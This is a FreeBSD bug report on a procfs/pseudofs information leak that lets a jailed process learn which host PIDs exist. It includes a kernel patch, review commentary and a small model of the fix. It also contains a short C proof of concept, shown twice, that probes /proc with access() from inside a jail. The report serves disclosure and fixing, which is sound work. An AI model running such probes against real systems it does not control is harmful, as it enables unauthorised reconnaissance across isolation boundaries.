| Summary: | Bug in procfs(5) closed in jail. | | |
|---|---|---|---|
| Product: | Base System | Reporter: | Pawel Jakub Dawidek <nick> |
| Component: | kern | Assignee: | Pawel Jakub Dawidek <pjd> |
| Status: | Closed FIXED | | |
| Severity: | Affects Only Me | | |
| Priority: | Normal | | |
| Version: | 4.7-STABLE | | |
| Hardware: | Any | | |
| OS: | Any | | |
Responsible Changed
From-To: freebsd-bugs->des

Assign to procfs maintainer

On Mon, Feb 10, 2003 at 06:08:00PM +0100, Pawel Jakub Dawidek wrote:
+> >Number: 48156
+> >Category: kern
+> >Synopsis: Bug in procfs(5) closed in jail.
[...]
+> >Release: FreeBSD 4.7-STABLE i386
This problem also exists in the pseudofs implementation in FreeBSD 5.x, because
the pfs_access() function doesn't check whether the given file/directory is
visible to the process.
This program shows this leakage.
-----[ start ]-----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/jail.h>

#define PID_MAX 99999

int
main(void)
{
	struct jail j = { 0, "/", "test", 0 };
	char filename[16];
	unsigned i;

	if (jail(&j) < 0 || chdir("/proc") != 0)
		exit(EXIT_FAILURE);
	printf("My PID: %u\n", getpid());
	for (i = 0; i < PID_MAX; ++i) {
		snprintf(filename, sizeof(filename), "%u", i);
		if (access(filename, 0777) == 0)
			printf("Process %u is running.\n", i);
	}
	exit(EXIT_SUCCESS);
}
-----[ end ]-----
This patch fixes it. Patch against FreeBSD 5.1-CURRENT, kern.osreldate: 501102.
diff -upr /usr/src/sys/fs/pseudofs/pseudofs_vnops.c src/sys/fs/pseudofs/pseudofs_vnops.c
--- /usr/src/sys/fs/pseudofs/pseudofs_vnops.c Tue Jul 15 01:54:02 2003
+++ src/sys/fs/pseudofs/pseudofs_vnops.c Tue Jul 15 01:53:44 2003
@@ -101,10 +101,15 @@ static int
pfs_access(struct vop_access_args *va)
{
struct vnode *vn = va->a_vp;
+ struct pfs_vdata *pvd = (struct pfs_vdata *)vn->v_data;
+ struct pfs_node *pn = pvd->pvd_pn;
struct vattr vattr;
int error;
PFS_TRACE((((struct pfs_vdata *)vn->v_data)->pvd_pn->pn_name));
+
+ if (!pfs_visible(va->a_td, pn, pvd->pvd_pid))
+ PFS_RETURN (ENOENT);
error = VOP_GETATTR(vn, &vattr, va->a_cred, va->a_td);
if (error)
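Review bot: the visibility check added at the top of pfs_access() has no comment saying why it returns ENOENT rather than EACCES; a one-line comment stating that a node the caller may not see must look exactly like a missing one would keep a later cleanup from changing the errno and reopening the PID-existence leak. With `pvd` and `pn` now declared, the unchanged PFS_TRACE line can use `pn->pn_name` instead of repeating the cast chain, so the node is dereferenced in one place. The hunk covers pseudofs in 5.1-CURRENT only, so the 4.7-STABLE procfs this PR was filed against still needs its own change.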
--
Pawel Jakub Dawidek pawel@dawidek.net
UNIX Systems Programmer/Administrator http://garage.freebsd.pl
Am I Evil? Yes, I Am! http://cerber.sourceforge.net
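The effect of putting a visibility test in front of the access check, as an added user-space model (not code from this PR or from FreeBSD). The process table, `proc_entry`, `model_visible` and the rule that a jail sees only its own processes are assumptions made for the illustration.

```c
/* Added illustration: user-space model, not FreeBSD kernel code. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed sample process table; jail_id 0 stands for the host. */
struct proc_entry { int pid; int jail_id; };
static const struct proc_entry table[] = {
    { 1, 0 }, { 214, 0 }, { 530, 0 },       /* host processes */
    { 611, 1 }, { 612, 1 }, { 700, 2 },     /* jail 1, jail 1, jail 2 */
};

static const struct proc_entry *find_pid(int pid) {
    for (size_t i = 0; i < sizeof(table) / sizeof(table[0]); i++)
        if (table[i].pid == pid)
            return &table[i];
    return NULL;
}

/* Assumed rule: the host sees every process, a jail sees only its own. */
static int model_visible(int caller_jail, const struct proc_entry *p) {
    return caller_jail == 0 || caller_jail == p->jail_id;
}

/* No visibility test: success depends only on whether the PID exists. */
static int access_unchecked(int caller_jail, int pid) {
    (void)caller_jail;
    return find_pid(pid) != NULL ? 0 : ENOENT;
}

/* Visibility test first; a hidden PID gets the same errno as a missing one. */
static int access_checked(int caller_jail, int pid) {
    const struct proc_entry *p = find_pid(pid);
    if (p == NULL || !model_visible(caller_jail, p))
        return ENOENT;
    return 0;
}

/* Number of PIDs below max_pid for which `check` reports success. */
static int count_reachable(int (*check)(int, int), int caller_jail, int max_pid) {
    int n = 0;
    for (int pid = 0; pid < max_pid; pid++)
        n += (check(caller_jail, pid) == 0);
    return n;
}

int main(void) {
    printf("jail 1, unchecked: %d PIDs\n", count_reachable(access_unchecked, 1, 1000));
    printf("jail 1, checked:   %d PIDs\n", count_reachable(access_checked, 1, 1000));
    return 0;
}
```

A regression test for the real fix can use the same shape: from inside a jail, the set of PIDs for which access() succeeds under /proc should equal the set of processes belonging to that jail.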
State Changed
From-To: open->analyzed

The problem is easily reproducible and the patch seems correct.

Responsible Changed
From-To: des->freebsd-bugs

I have fixed pseudofs in -CURRENT, but have neither the time nor the inclination to fix procfs / linprocfs in -STABLE.

State Changed
From-To: analyzed->open

Hard to believe freebsd-bugs is analyzing this PR.

Responsible Changed
From-To: freebsd-bugs->pjd

Pawel has a commit bit now.

State Changed
From-To: open->closed

Problem doesn't exist in -CURRENT.
There is a way to get the list of running processes of the main host when we are inside a jail and procfs is mounted there. We can't get information about the running processes, but we can get their PIDs.

Fix:
This patch fixes this bug and fixes the ps_showallprocs problem too.

How-To-Repeat:
This simple program shows how this works:

-----[ start ]-----
#include <stdio.h>
#include <stdlib.h>	/* exit() */
#include <unistd.h>
#include <sys/types.h>
#include <sys/jail.h>

#define PID_MAX 99999

int
main(int argc, char *argv[])
{
	struct jail j = { 0, "/", "test", 0 };
	char filename[16];
	unsigned i;	/* unsigned to match the %u conversions below */

	if (jail(&j) != 0 || chdir("/proc") != 0)
		exit(1);
	for (i = 0; i < PID_MAX; ++i) {
		snprintf(filename, sizeof(filename), "%u", i);
		if (access(filename, 0) == 0)
			printf("Process %u is running.\n", i);
	}
	exit(0);
}
-----[ end ]-----